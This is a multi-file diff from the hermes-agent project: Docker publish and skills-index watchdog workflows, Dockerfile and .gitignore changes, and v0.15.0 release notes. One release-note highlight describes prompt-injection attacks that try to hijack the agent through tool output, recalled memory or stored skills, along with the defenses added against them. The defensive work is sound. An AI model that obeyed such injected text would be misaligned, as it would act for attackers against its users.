if: github.event_name == 'pull_request'
uses: docker/build-push-action@bcafcacb16a39f128d818304e6c9c0c18556b85f # v7.1.0
with:
context: .
@@ -210,6 +209,22 @@ jobs:
load: true
platforms: linux/arm64
tags: ${{ env.IMAGE_NAME }}:test
build-args: |
HERMES_GIT_SHA=${{ github.sha }}
# Main/release builds still use the per-arch gha cache so the digest
# push below can reuse layers from this smoke-test build.
- name: Build image (arm64, smoke test, cached publish)
if: github.event_name != 'pull_request'
uses: docker/build-push-action@bcafcacb16a39f128d818304e6c9c0c18556b85f # v7.1.0
with:
context: .
file: Dockerfile
load: true
platforms: linux/arm64
tags: ${{ env.IMAGE_NAME }}:test
build-args: |
HERMES_GIT_SHA=${{ github.sha }}
cache-from: type=gha,scope=docker-arm64
cache-to: type=gha,mode=max,scope=docker-arm64
@@ -235,6 +250,8 @@ jobs:
platforms: linux/arm64
labels: |
org.opencontainers.image.revision=${{ github.sha }}
build-args: |
HERMES_GIT_SHA=${{ github.sha }}
outputs: type=image,name=${{ env.IMAGE_NAME }},push-by-digest=true,name-canonical=true,push=true
cache-from: type=gha,scope=docker-arm64
cache-to: type=gha,mode=max,scope=docker-arm64
@@ -258,30 +275,17 @@ jobs:
# ---------------------------------------------------------------------------
# Stitch both per-arch digests into a single tagged multi-arch manifest.
# This is a registry-side operation — no building, no layer re-push —
# so it runs in ~30 seconds. On main pushes it produces :main; on
# releases it produces :<release_tag_name>.
# so it runs in ~30 seconds.
#
# For main pushes the ancestor check runs BEFORE the manifest push so
# we never overwrite :main with an older commit. The top-level
# concurrency group (`docker-${{ github.ref }}` with
# `cancel-in-progress: false`) already serialises runs per ref; the
# ancestor check is defense-in-depth.
# On main pushes: tags both :main and :latest.
# On releases: tags :<release_tag_name>.
# ---------------------------------------------------------------------------
merge:
if: github.repository == 'NousResearch/hermes-agent' && (github.event_name == 'push' && github.ref == 'refs/heads/main' || github.event_name == 'release')
runs-on: ubuntu-latest
needs: [build-amd64, build-arm64]
timeout-minutes: 10
outputs:
pushed_release_tag: ${{ steps.mark_release_pushed.outputs.pushed }}
release_tag: ${{ steps.tag.outputs.tag }}
steps:
- name: Checkout code
if: github.event_name == 'push' && github.ref == 'refs/heads/main'
uses: actions/checkout@de0fac2e4500dabe0009e67214ff5f5447ce83dd # v6.0.2
with:
fetch-depth: 1000
- name: Download digests
uses: actions/download-artifact@d3f86a106a0bac45b974a628896c90dbdf5c8093 # v4
with:
@@ -298,86 +302,7 @@ jobs:
username: ${{ secrets.DOCKERHUB_USERNAME }}
password: ${{ secrets.DOCKERHUB_TOKEN }}
# Read the git revision label off the current :main manifest, then
# use `git merge-base --is-ancestor` to check whether our commit is
# a descendant of it. If :main doesn't exist yet, or its label is
# missing, we treat that as "safe to publish". If another run
# already advanced :main past us (or diverged), we skip and leave
# it alone.
- name: Decide whether to move :main
if: github.event_name == 'push' && github.ref == 'refs/heads/main'
id: main_check
run: |
set -euo pipefail
image=nousresearch/hermes-agent
image_json=$(
docker buildx imagetools inspect "${image}:main" \
--format '{{ json (index .Image "linux/amd64") }}' \
2>/dev/null || true
)
if [ -z "${image_json}" ]; then
echo "No existing :main (or inspect failed) — safe to publish."
echo "push_main=true" >> "$GITHUB_OUTPUT"
exit 0
fi
current_sha=$(
printf '%s' "${image_json}" \
| jq -r '.config.Labels."org.opencontainers.image.revision" // ""'
)
if [ -z "${current_sha}" ]; then
echo "Registry :main has no revision label — safe to publish."
echo "push_main=true" >> "$GITHUB_OUTPUT"
exit 0
fi
echo "Registry :main is at ${current_sha}"
echo "This run is at ${GITHUB_SHA}"
if [ "${current_sha}" = "${GITHUB_SHA}" ]; then
echo ":main already points at our SHA — nothing to do."
echo "push_main=false" >> "$GITHUB_OUTPUT"
exit 0
fi
if ! git cat-file -e "${current_sha}^{commit}" 2>/dev/null; then
git fetch --no-tags --prune origin \
"+refs/heads/main:refs/remotes/origin/main" \
|| true
fi
if ! git cat-file -e "${current_sha}^{commit}" 2>/dev/null; then
echo "Registry :main points at an unknown commit (${current_sha}); refusing to overwrite."
echo "push_main=false" >> "$GITHUB_OUTPUT"
exit 0
fi
if git merge-base --is-ancestor "${current_sha}" "${GITHUB_SHA}"; then
echo "Our commit is a descendant of :main — safe to advance."
echo "push_main=true" >> "$GITHUB_OUTPUT"
else
echo "Another run advanced :main past us (or diverged) — leaving it alone."
echo "push_main=false" >> "$GITHUB_OUTPUT"
fi
# Compute the tag for this run. Main pushes tag directly as :main
# (no per-commit SHA tags); releases use the release tag name.
- name: Compute tag
id: tag
run: |
if [ "${{ github.event_name }}" = "release" ]; then
echo "tag=${{ github.event.release.tag_name }}" >> "$GITHUB_OUTPUT"
else
echo "tag=main" >> "$GITHUB_OUTPUT"
fi
# Gate the manifest push on the ancestor check for main pushes.
# For releases there is no gate — the check doesn't even run.
- name: Create manifest list and push
if: github.event_name != 'push' || steps.main_check.outputs.push_main == 'true'
working-directory: /tmp/digests
run: |
set -euo pipefail
@@ -385,137 +310,26 @@ jobs:
for digest_file in *; do
args+=("${IMAGE_NAME}@sha256:${digest_file}")
done
docker buildx imagetools create \
-t "${IMAGE_NAME}:${TAG}" \
"${args[@]}"
if [ "${{ github.event_name }}" = "release" ]; then
TAG="${{ github.event.release.tag_name }}"
docker buildx imagetools create \
-t "${IMAGE_NAME}:${TAG}" \
"${args[@]}"
else
docker buildx imagetools create \
-t "${IMAGE_NAME}:main" \
-t "${IMAGE_NAME}:latest" \
"${args[@]}"
fi
env:
IMAGE_NAME: ${{ env.IMAGE_NAME }}
TAG: ${{ steps.tag.outputs.tag }}
- name: Inspect image
if: github.event_name != 'push' || steps.main_check.outputs.push_main == 'true'
run: |
docker buildx imagetools inspect "${IMAGE_NAME}:${TAG}"
if [ "${{ github.event_name }}" = "release" ]; then
docker buildx imagetools inspect "${IMAGE_NAME}:${{ github.event.release.tag_name }}"
else
docker buildx imagetools inspect "${IMAGE_NAME}:main"
fi
env:
IMAGE_NAME: ${{ env.IMAGE_NAME }}
TAG: ${{ steps.tag.outputs.tag }}
# Signal to move-latest that the release tag is live.
- name: Mark release tag pushed
id: mark_release_pushed
if: github.event_name == 'release'
run: echo "pushed=true" >> "$GITHUB_OUTPUT"
# ---------------------------------------------------------------------------
# Move :latest to point at the release tag the merge job pushed.
#
# :latest is the floating tag that tracks the most recent stable release.
# Only `release: published` events advance it — never main pushes.
#
# We still run an ancestor check against the existing :latest so that a
# backport release on an older branch (e.g. patching v1.1.5 after v1.2.3
# is out) doesn't drag :latest backwards. The check is the same shape
# as the ancestor check in the merge job for :main: read the OCI
# revision label off the current :latest, look up that commit in git,
# and only advance if our release commit is a strict descendant.
# ---------------------------------------------------------------------------
move-latest:
if: |
github.repository == 'NousResearch/hermes-agent'
&& github.event_name == 'release'
&& needs.merge.outputs.pushed_release_tag == 'true'
needs: merge
runs-on: ubuntu-latest
timeout-minutes: 10
concurrency:
group: docker-move-latest
cancel-in-progress: false
steps:
- name: Checkout code
uses: actions/checkout@de0fac2e4500dabe0009e67214ff5f5447ce83dd # v6.0.2
with:
fetch-depth: 1000
- name: Set up Docker Buildx
uses: docker/setup-buildx-action@8d2750c68a42422c14e847fe6c8ac0403b4cbd6f # v3
- name: Log in to Docker Hub
uses: docker/login-action@4907a6ddec9925e35a0a9e82d7399ccc52663121 # v4.1.0
with:
username: ${{ secrets.DOCKERHUB_USERNAME }}
password: ${{ secrets.DOCKERHUB_TOKEN }}
- name: Decide whether to move :latest
id: latest_check
run: |
set -euo pipefail
image=nousresearch/hermes-agent
image_json=$(
docker buildx imagetools inspect "${image}:latest" \
--format '{{ json (index .Image "linux/amd64") }}' \
2>/dev/null || true
)
if [ -z "${image_json}" ]; then
echo "No existing :latest (or inspect failed) — safe to publish."
echo "push_latest=true" >> "$GITHUB_OUTPUT"
exit 0
fi
current_sha=$(
printf '%s' "${image_json}" \
| jq -r '.config.Labels."org.opencontainers.image.revision" // ""'
)
if [ -z "${current_sha}" ]; then
echo "Registry :latest has no revision label — safe to publish."
echo "push_latest=true" >> "$GITHUB_OUTPUT"
exit 0
fi
echo "Registry :latest is at ${current_sha}"
echo "This release is at ${GITHUB_SHA}"
if [ "${current_sha}" = "${GITHUB_SHA}" ]; then
echo ":latest already points at our SHA — nothing to do."
echo "push_latest=false" >> "$GITHUB_OUTPUT"
exit 0
fi
# Make sure we have the :latest commit locally for merge-base.
# Releases can be cut from any branch, so fetch broadly.
if ! git cat-file -e "${current_sha}^{commit}" 2>/dev/null; then
git fetch --no-tags --prune origin \
"+refs/heads/main:refs/remotes/origin/main" \
|| true
fi
if ! git cat-file -e "${current_sha}^{commit}" 2>/dev/null; then
echo "Registry :latest points at an unknown commit (${current_sha}); refusing to overwrite."
echo "push_latest=false" >> "$GITHUB_OUTPUT"
exit 0
fi
# Our release SHA must be a descendant of the current :latest.
# Backport releases on older branches won't satisfy this and will
# be left alone — :latest stays on the newer release.
if git merge-base --is-ancestor "${current_sha}" "${GITHUB_SHA}"; then
echo "Our release commit is a descendant of :latest — safe to advance."
echo "push_latest=true" >> "$GITHUB_OUTPUT"
else
echo "Existing :latest is newer than this release (likely a backport) — leaving it alone."
echo "push_latest=false" >> "$GITHUB_OUTPUT"
fi
# Retag the already-pushed release manifest as :latest.
- name: Move :latest to this release tag
if: steps.latest_check.outputs.push_latest == 'true'
env:
RELEASE_TAG: ${{ needs.merge.outputs.release_tag }}
run: |
set -euo pipefail
image=nousresearch/hermes-agent
docker buildx imagetools create \
--tag "${image}:latest" \
"${image}:${RELEASE_TAG}"
@@ -0,0 +1,149 @@
name: Skills Index Freshness Check
# Belt-and-suspenders for the twice-daily build_skills_index pipeline.
# If the live /docs/api/skills-index.json ever goes more than 26 hours
# stale OR the file disappears entirely OR a major source has collapsed,
# this workflow opens a GitHub issue so we hear about it before users do.
#
# Triggered every 4 hours so we catch a stuck cron within one tick.
on:
schedule:
- cron: '0 */4 * * *'
workflow_dispatch:
permissions:
contents: read
issues: write
jobs:
check-freshness:
if: github.repository == 'NousResearch/hermes-agent'
runs-on: ubuntu-latest
steps:
- name: Probe live index
id: probe
run: |
set -e
URL="https://hermes-agent.nousresearch.com/docs/api/skills-index.json"
echo "Probing $URL"
# -L follows redirects; -f fails on HTTP errors; -s suppresses progress
if ! curl -fsSL -o /tmp/skills-index.json "$URL"; then
echo "status=fetch-failed" >> "$GITHUB_OUTPUT"
echo "detail=Could not download $URL" >> "$GITHUB_OUTPUT"
exit 0
fi
# Validate + extract generated_at and per-source counts
python3 <<'PY' >> "$GITHUB_OUTPUT"
import json, sys
from datetime import datetime, timezone
try:
with open("/tmp/skills-index.json") as f:
data = json.load(f)
except Exception as e:
print(f"status=parse-failed")
print(f"detail=JSON decode error: {e}")
sys.exit(0)
generated_at = data.get("generated_at", "")
total = data.get("skill_count", 0)
skills = data.get("skills", [])
if not isinstance(skills, list):
print("status=invalid-shape")
print(f"detail=skills field is not a list (got {type(skills).__name__})")
sys.exit(0)
# Per-source counts
from collections import Counter
by_src = Counter(s.get("source", "") for s in skills)
# Freshness
age_hours = None
try:
ts = datetime.fromisoformat(generated_at.replace("Z", "+00:00"))
age_hours = (datetime.now(timezone.utc) - ts).total_seconds() / 3600
except Exception:
pass
# Floors — same as build_skills_index.py EXPECTED_FLOORS.
floors = {
"skills.sh": 100,
"lobehub": 100,
"clawhub": 50,
"official": 50,
"github": 30,
"browse-sh": 50,
}
issues = []
if age_hours is not None and age_hours > 26:
issues.append(f"Index is {age_hours:.1f}h old (limit 26h)")
for src, floor in floors.items():
count = by_src.get(src, 0)
if src == "skills.sh":
count = by_src.get("skills.sh", 0) + by_src.get("skills-sh", 0)
if count < floor:
issues.append(f"{src}: {count} < {floor}")
if total < 1500:
issues.append(f"total skills: {total} < 1500")
if issues:
detail = "; ".join(issues)
print("status=degraded")
# GITHUB_OUTPUT doesn't allow newlines without explicit delimiter
print(f"detail={detail}")
else:
print("status=ok")
print(f"detail=Index OK — {total} skills, generated {generated_at}")
by_summary = ", ".join(f"{k}={v}" for k, v in by_src.most_common(8))
print(f"summary={by_summary}")
PY
- name: Report status
run: |
echo "Probe status: ${{ steps.probe.outputs.status }}"
echo "Detail: ${{ steps.probe.outputs.detail }}"
if [ -n "${{ steps.probe.outputs.summary }}" ]; then
echo "Summary: ${{ steps.probe.outputs.summary }}"
fi
- name: Open issue on degraded / failed probe
if: steps.probe.outputs.status != 'ok'
env:
GH_TOKEN: ${{ secrets.GITHUB_TOKEN }}
STATUS: ${{ steps.probe.outputs.status }}
DETAIL: ${{ steps.probe.outputs.detail }}
run: |
# Find existing open issue by title prefix so we don't spam — we
# append a comment instead of opening a new one each tick.
TITLE_PREFIX="[skills-index-watchdog]"
existing=$(gh issue list \
--repo "${{ github.repository }}" \
--state open \
--search "in:title \"$TITLE_PREFIX\"" \
--json number,title \
--jq '.[] | select(.title | startswith("'"$TITLE_PREFIX"'")) | .number' \
| head -1)
BODY="Automated freshness probe failed.
**Status:** \`$STATUS\`
**Detail:** $DETAIL
The Skills Hub at /docs/skills depends on \`/docs/api/skills-index.json\`.
The unified index is rebuilt by \`.github/workflows/skills-index.yml\` (cron 6/18 UTC)
and \`.github/workflows/deploy-site.yml\` (on every push affecting website/skills).
If this issue keeps reopening, check the latest runs:
- https://github.com/${{ github.repository }}/actions/workflows/skills-index.yml
- https://github.com/${{ github.repository }}/actions/workflows/deploy-site.yml
This issue was opened by \`.github/workflows/skills-index-freshness.yml\`. Close it once the underlying problem is fixed; the next probe will reopen if it's still broken."
if [ -n "$existing" ]; then
echo "Appending to existing issue #$existing"
gh issue comment "$existing" --repo "${{ github.repository }}" --body "Probe still failing at $(date -u +%FT%TZ): \`$STATUS\` — $DETAIL"
else
echo "Opening new watchdog issue"
gh issue create --repo "${{ github.repository }}" \
--title "$TITLE_PREFIX Skills index is stale or degraded ($STATUS)" \
--body "$BODY"
fi
+18 -1
View File
@@ -12,6 +12,13 @@ __pycache__/
.env.production.local
.env.development
.env.test
.hermes-docker/
.notebooklm-home/
.notebooklm-cli-venv/
.notebooklm-playwright/
.pip-cache/
.uv-cache/
compose.hermes.local.yml
export*
__pycache__/model_tools.cpython-310.pyc
__pycache__/web_tools.cpython-310.pyc
@@ -71,7 +78,17 @@ mini-swe-agent/
.nix-stamps/
result
website/static/api/skills-index.json
# skills.json + skills-meta.json are build artifacts emitted by
# website/scripts/extract-skills.py during prebuild — keep them out of
# git for the same reason as skills-index.json (large, generated, change
# every build).
website/static/api/skills.json
website/static/api/skills-meta.json
models-dev-upstream/
hermes_cli/tui_dist/*
hermes_cli/scripts/
docs/superpowers/*
docs/superpowers/*
# Working directory for the Hermes Agent's session state (~/.hermes/ at runtime;
# also created in-repo when an agent operates in this checkout). Plans, audit
# logs, and per-session caches are never artifacts of the codebase.
.hermes/
+79 -12
View File
@@ -1,4 +1,12 @@
FROM ghcr.io/astral-sh/uv:0.11.6-python3.13-trixie@sha256:b3c543b6c4f23a5f2df22866bd7857e5d304b67a564f4feab6ac22044dde719b AS uv_source
# Node 22 LTS source stage. Debian trixie's bundled nodejs is pinned to 20.x
# which reached EOL in April 2026 — we copy node + npm + corepack from the
# upstream node:22 image instead so we can stay on a supported LTS without
# waiting for Debian 14 (forky, ~mid-2027). Bookworm-based slim image used
# so the produced binary links against glibc 2.36, which runs cleanly on
# our Debian 13 (trixie, glibc 2.41) runtime. Bumping to a new Node major
# is a one-line ARG change; see #4977.
FROM node:22-bookworm-slim@sha256:7af03b14a13c8cdd38e45058fd957bf00a72bbe17feac43b1c15a689c029c732 AS node_source
FROM debian:13.4
# Disable Python stdout buffering to ensure logs are printed immediately
@@ -17,7 +25,7 @@ ENV PLAYWRIGHT_BROWSERS_PATH=/opt/hermes/.playwright
# hermes process, the dashboard, and per-profile gateways.
RUN apt-get update && \
apt-get install -y --no-install-recommends \
build-essential curl nodejs npm python3 ripgrep ffmpeg gcc python3-dev libffi-dev procps git openssh-client docker-cli xz-utils && \
ca-certificates curl python3 python-is-python3 ripgrep ffmpeg gcc python3-dev libffi-dev procps git openssh-client docker-cli xz-utils && \
rm -rf /var/lib/apt/lists/*
# ---------- s6-overlay install ----------
@@ -72,6 +80,18 @@ RUN useradd -u 10000 -m -d /opt/data hermes
COPY --chmod=0755 --from=uv_source /usr/local/bin/uv /usr/local/bin/uvx /usr/local/bin/
# Node 22 LTS: copy the node binary plus the bundled npm + corepack JS
# installs from the upstream image. npm and npx are recreated as symlinks
# because they're symlinks in the source image (and need to live on PATH).
# See node_source stage at the top of the file for the version-bump
# rationale (#4977).
COPY --chmod=0755 --from=node_source /usr/local/bin/node /usr/local/bin/
COPY --from=node_source /usr/local/lib/node_modules/npm /usr/local/lib/node_modules/npm
COPY --from=node_source /usr/local/lib/node_modules/corepack /usr/local/lib/node_modules/corepack
RUN ln -sf /usr/local/lib/node_modules/npm/bin/npm-cli.js /usr/local/bin/npm && \
ln -sf /usr/local/lib/node_modules/npm/bin/npx-cli.js /usr/local/bin/npx && \
ln -sf /usr/local/lib/node_modules/corepack/dist/corepack.js /usr/local/bin/corepack
WORKDIR /opt/hermes
# ---------- Layer-cached dependency install ----------
@@ -88,14 +108,15 @@ COPY ui-tui/package.json ui-tui/package-lock.json ui-tui/
COPY ui-tui/packages/hermes-ink/ ui-tui/packages/hermes-ink/
# `npm_config_install_links=false` forces npm to install `file:` deps as
# symlinks (the npm 10+ default) even on Debian's older bundled npm 9.x,
# which defaults to `install-links=true` and installs file deps as *copies*.
# The host-side package-lock.json is generated with a newer npm that uses
# symlinks, so an install-as-copy produces a hidden node_modules/.package-lock.json
# that permanently disagrees with the root lock on the @hermes/ink entry.
# That disagreement trips the TUI launcher's `_tui_need_npm_install()`
# check on every startup and triggers a runtime `npm install` that then
# fails with EACCES (node_modules/ is root-owned from build time).
# symlinks instead of copies. This is the default since npm 10+, which is
# what the image ships now (via the node:22 source stage). We set it
# explicitly anyway as defense-in-depth: the previous Debian-bundled npm
# 9.x defaulted to install-as-copy, which produced a hidden
# node_modules/.package-lock.json that permanently disagreed with the root
# lock on the @hermes/ink entry, tripped the TUI launcher's
# `_tui_need_npm_install()` check on every startup, and triggered a
# runtime `npm install` that then failed with EACCES. Keeping the env
# guards against a future regression if the source npm version changes.
ENV npm_config_install_links=false
RUN npm install --prefer-offline --no-audit && \
@@ -124,10 +145,14 @@ RUN npm install --prefer-offline --no-audit && \
# git), `[yc-bench]` (another git dep), and `[termux-all]` (Android
# redundancy), none of which belong in the published container.
#
# Provider packages (anthropic, bedrock, azure-identity) are included
# so Docker users can use these providers without requiring runtime
# lazy-install access to PyPI (often blocked in containerized envs).
#
# The editable link is created after the source copy below.
COPY pyproject.toml uv.lock ./
RUN touch ./README.md
RUN uv sync --frozen --no-install-project --extra all --extra messaging
RUN uv sync --frozen --no-install-project --extra all --extra messaging --extra anthropic --extra bedrock --extra azure-identity
# ---------- Source code ----------
# .dockerignore excludes node_modules, so the installs above survive.
@@ -162,6 +187,29 @@ RUN chmod -R a+rX /opt/hermes && \
# this a fast (~1s) egg-link creation with no resolution or downloads.
RUN uv pip install --no-cache-dir --no-deps -e "."
# ---------- Bake build-time git revision ----------
# .dockerignore excludes .git, so `git rev-parse HEAD` from inside the
# container always returns nothing — meaning `hermes dump` reports
# "(unknown)" and the startup banner drops its `· upstream <sha>` suffix.
# That makes support triage from container bug reports impossible:
# we can't tell which commit the user is actually running.
#
# Fix: write the commit SHA passed via the HERMES_GIT_SHA build-arg to
# /opt/hermes/.hermes_build_sha at build time, and have
# hermes_cli/build_info.py read it at runtime. Both `hermes dump` and
# banner.get_git_banner_state() try the baked SHA first, then fall back
# to live `git rev-parse` for source installs (unchanged behaviour).
#
# The arg is optional — local `docker build` without --build-arg simply
# omits the file, and the runtime falls back to live-git lookup. CI
# (.github/workflows/docker-publish.yml) passes ${{ github.sha }} so
# every published image has it.
ARG HERMES_GIT_SHA=
RUN if [ -n "${HERMES_GIT_SHA}" ]; then \
printf '%s\n' "${HERMES_GIT_SHA}" > /opt/hermes/.hermes_build_sha && \
chown hermes:hermes /opt/hermes/.hermes_build_sha; \
fi
# ---------- s6-overlay service wiring ----------
# Static services declared at build time: main-hermes + dashboard.
# Per-profile gateway services are registered dynamically at runtime by
@@ -179,7 +227,7 @@ COPY docker/s6-rc.d/ /etc/s6-overlay/s6-rc.d/
# slots from $HERMES_HOME/profiles/<name>/ after a container restart
# (the /run/service/ scandir is tmpfs and wiped on restart). Phase 4.
RUN mkdir -p /etc/cont-init.d && \
printf '#!/bin/sh\nexec /opt/hermes/docker/stage2-hook.sh\n' \
printf '#!/command/with-contenv sh\nexec /opt/hermes/docker/stage2-hook.sh\n' \
> /etc/cont-init.d/01-hermes-setup && \
chmod +x /etc/cont-init.d/01-hermes-setup
COPY --chmod=0755 docker/cont-init.d/015-supervise-perms /etc/cont-init.d/015-supervise-perms
@@ -188,13 +236,32 @@ COPY --chmod=0755 docker/cont-init.d/02-reconcile-profiles /etc/cont-init.d/02-r
# ---------- Runtime ----------
ENV HERMES_WEB_DIST=/opt/hermes/hermes_cli/web_dist
ENV HERMES_HOME=/opt/data
# `docker exec` privilege-drop shim. When operators run
# `docker exec <c> hermes ...` they default to root, and any file the
# command writes under $HERMES_HOME (auth.json, .env, config.yaml) ends
# up root-owned and unreadable to the supervised gateway (UID 10000).
# The shim lives at /opt/hermes/bin/hermes, sits earliest on PATH, and
# transparently re-exec's the real venv binary via `s6-setuidgid hermes`
# when invoked as root. Non-root callers (supervised processes,
# `--user hermes`, etc.) hit the short-circuit path with no overhead.
# Recursion is impossible because the shim exec's the venv binary by
# absolute path (/opt/hermes/.venv/bin/hermes). See the shim source for
# the opt-out env var (HERMES_DOCKER_EXEC_AS_ROOT=1).
COPY --chmod=0755 docker/hermes-exec-shim.sh /opt/hermes/bin/hermes
# Pre-s6 entrypoint.sh did `source .venv/bin/activate` which exported
# the venv bin onto PATH; Architecture B's main-wrapper.sh does the
# same for the container's main process, but `docker exec` and our
# cont-init.d scripts don't pass through the wrapper. Expose the venv
# bin globally so `docker exec <container> hermes ...` and any
# subprocess that doesn't activate the venv first still find hermes.
ENV PATH="/opt/hermes/.venv/bin:/opt/data/.local/bin:${PATH}"
#
# /opt/hermes/bin is prepended ahead of the venv so the privilege-drop
# shim wins PATH resolution. The shim's last act is to exec the venv
# binary by absolute path, so this PATH ordering is transparent to
# every other consumer.
ENV PATH="/opt/hermes/bin:/opt/hermes/.venv/bin:/opt/data/.local/bin:${PATH}"
RUN mkdir -p /opt/data
VOLUME [ "/opt/data" ]
+1 -1
View File
@@ -22,7 +22,7 @@ Use any model you want — [Nous Portal](https://portal.nousresearch.com), [Open
<tr><td><b>A closed learning loop</b></td><td>Agent-curated memory with periodic nudges. Autonomous skill creation after complex tasks. Skills self-improve during use. FTS5 session search with LLM summarization for cross-session recall. <a href="https://github.com/plastic-labs/honcho">Honcho</a> dialectic user modeling. Compatible with the <a href="https://agentskills.io">agentskills.io</a> open standard.</td></tr>
<tr><td><b>Scheduled automations</b></td><td>Built-in cron scheduler with delivery to any platform. Daily reports, nightly backups, weekly audits — all in natural language, running unattended.</td></tr>
<tr><td><b>Delegates and parallelizes</b></td><td>Spawn isolated subagents for parallel workstreams. Write Python scripts that call tools via RPC, collapsing multi-step pipelines into zero-context-cost turns.</td></tr>
<tr><td><b>Runs anywhere, not just your laptop</b></td><td>Seven terminal backends — local, Docker, SSH, Singularity, Modal, Daytona, and Vercel Sandbox. Daytona and Modal offer serverless persistence — your agent's environment hibernates when idle and wakes on demand, costing nearly nothing between sessions. Run it on a $5 VPS or a GPU cluster.</td></tr>
<tr><td><b>Runs anywhere, not just your laptop</b></td><td>Six terminal backends — local, Docker, SSH, Singularity, Modal, and Daytona. Daytona and Modal offer serverless persistence — your agent's environment hibernates when idle and wakes on demand, costing nearly nothing between sessions. Run it on a $5 VPS or a GPU cluster.</td></tr>
<tr><td><b>Research-ready</b></td><td>Batch trajectory generation, trajectory compression for training the next generation of tool-calling models.</td></tr>
</table>
+651
View File
@@ -0,0 +1,651 @@
# Hermes Agent v0.15.0 (v2026.5.28)
**Release Date:** May 28, 2026
**Since v0.14.0:** 1,302 commits · 747 merged PRs · 1,746 files changed · 282,712 insertions · 36,699 deletions · 560+ issues closed (15 P0, 65 P1, 19 security-tagged) · 321 community contributors (including co-authors)
> **The Velocity Release.** Hermes gets dramatically faster — to start, to run, to ship work, and to grow. The 16,083-line `run_agent.py` collapses to 3,821 (-76%) across 14 cohesive `agent/*` modules. Kanban grew into a real multi-agent platform across 104 PRs — orchestrator auto-decomposition, swarm topology, scheduled tasks, worktree-per-task, per-task model overrides. The cold-start perf wave keeps going: another second shaved off launch, 47% fewer per-conversation function calls, `hermes --version` flipping the head-to-head benchmark against Codex CLI. `session_search` is 4,500× faster and free now. Promptware defense lands against Brainworm-class attacks. Bitwarden Secrets Manager replaces N per-provider API keys with one bootstrap token. Skill bundles let one slash command load a whole workflow. The Ink TUI gets a multi-session orchestrator. Two new image_gen providers (Krea 2 Medium + Large, FAL ported to plugin), the Nous-approved MCP catalog with an interactive picker, an OpenHands orchestration skill, ntfy as the 23rd messaging platform, and a deep xAI integration round (Web Search plugin, xai-oauth `hermes proxy` upstream, retired-May-15 model detection + `hermes migrate xai`, natural TTS speech-tag pauses, base_url leak guard, OpenAI-style execution guidance for Grok). 15 P0 + 65 P1 closures alongside.
---
## ✨ Highlights
- **The Big Refactor — `run_agent.py` is no longer 16,000 lines** — The file at the heart of Hermes — the agent conversation loop — has been reduced from 16,083 lines to 3,821 (-76%), with the extracted code redistributed across 14 cohesive modules under `agent/`. Behavior is unchanged: every extraction keeps a thin forwarder on `AIAgent`, every test patch path still works, every external caller is compatible. The reason you care: future Hermes development moves faster, plugin authors can finally grep the codebase, and the file that took 90 seconds to load in your editor opens in a blink. ([#27248](https://github.com/NousResearch/hermes-agent/pull/27248))
- **Kanban grew into a real multi-agent platform — 104 PRs end to end** — Triage auto-decomposes one task into a tree of sub-tasks. `hermes kanban swarm` creates a full Swarm v1 graph in one command — root, parallel workers, gated verifier, gated synthesizer, shared blackboard. Tasks support per-task model overrides (cheap models for boilerplate, expensive ones for hard sub-tasks), board-level default workdirs, per-task worktree paths and branches, scheduled start times, configurable claim TTL, retry fingerprinting, stale-task detection, respawn guards, and a drag-to-delete trash zone. Workers report through `/workers/active`, `/runs/{id}`, and `/inspect` endpoints. ([#27572](https://github.com/NousResearch/hermes-agent/pull/27572), [#28443](https://github.com/NousResearch/hermes-agent/pull/28443), [#28364](https://github.com/NousResearch/hermes-agent/pull/28364), [#28394](https://github.com/NousResearch/hermes-agent/pull/28394), [#28462](https://github.com/NousResearch/hermes-agent/pull/28462), [#28384](https://github.com/NousResearch/hermes-agent/pull/28384), [#28467](https://github.com/NousResearch/hermes-agent/pull/28467), [#28455](https://github.com/NousResearch/hermes-agent/pull/28455), [#28452](https://github.com/NousResearch/hermes-agent/pull/28452), [#28432](https://github.com/NousResearch/hermes-agent/pull/28432), [#28468](https://github.com/NousResearch/hermes-agent/pull/28468), [#28420](https://github.com/NousResearch/hermes-agent/pull/28420))
- **Cold-start perf wave keeps going — another second saved, 47% fewer per-turn function calls** — Three new optimization rounds: defer `openai._base_client` import (-240ms / -17MB on every CLI invocation), hot-path optimizations cut 47% of per-conversation function calls (399k → 213k for 31-turn chat), defer compression-feasibility check (-170 to -290ms on every agent construction), adaptive subprocess polling (-195ms per tool call, 1+ second per turn). Termux cold start drops from 2.9s to 0.8s. `hermes --version` cold drops 63% (701ms → 258ms), flipping the head-to-head benchmark against Codex CLI from 5/11 wins to 6/11. ([#28864](https://github.com/NousResearch/hermes-agent/pull/28864), [#28866](https://github.com/NousResearch/hermes-agent/pull/28866), [#28957](https://github.com/NousResearch/hermes-agent/pull/28957), [#29006](https://github.com/NousResearch/hermes-agent/pull/29006), [#29419](https://github.com/NousResearch/hermes-agent/pull/29419), [#30121](https://github.com/NousResearch/hermes-agent/pull/30121), [#30609](https://github.com/NousResearch/hermes-agent/pull/30609), [#31968](https://github.com/NousResearch/hermes-agent/pull/31968))
- **`session_search` rebuilt — no LLM, no cost, 4,500× faster** — The old `session_search` was an aux-LLM-powered tool that cost ~$0.30/call and took ~30 seconds to summarize three sessions, sometimes confabulating when the right session wasn't even in the FTS5 hit list. The new shape is one tool with three modes (discovery, scroll, browse) inferred from which args are set — no `mode` parameter, no aux-LLM, no config knob, no companion skill. Discovery is ~20ms instead of ~90s; scroll is ~1ms. Searching your past sessions for context is now free and instant. ([#27590](https://github.com/NousResearch/hermes-agent/pull/27590))
- **Promptware defense — Brainworm-class attacks blocked at three chokepoints** — Inspired by recent Brainworm / Promptware Kill Chain research (Origin HQ, arxiv 2601.09625), Hermes now defends the context window against prompt-injection attacks that try to hijack the agent via tool output, recalled memory, or stored skills. Single source of truth (`tools/threat_patterns.py`) with ~15 new Brainworm/C2 patterns; recalled memory is scanned at load time; tool results get delimiter markers so a malicious file or remote service can't impersonate Hermes' own system content. Paired with a new `security-guidance` plugin that pattern-matches dangerous code writes. ([#32269](https://github.com/NousResearch/hermes-agent/pull/32269), [#33131](https://github.com/NousResearch/hermes-agent/pull/33131), [#9151](https://github.com/NousResearch/hermes-agent/pull/9151))
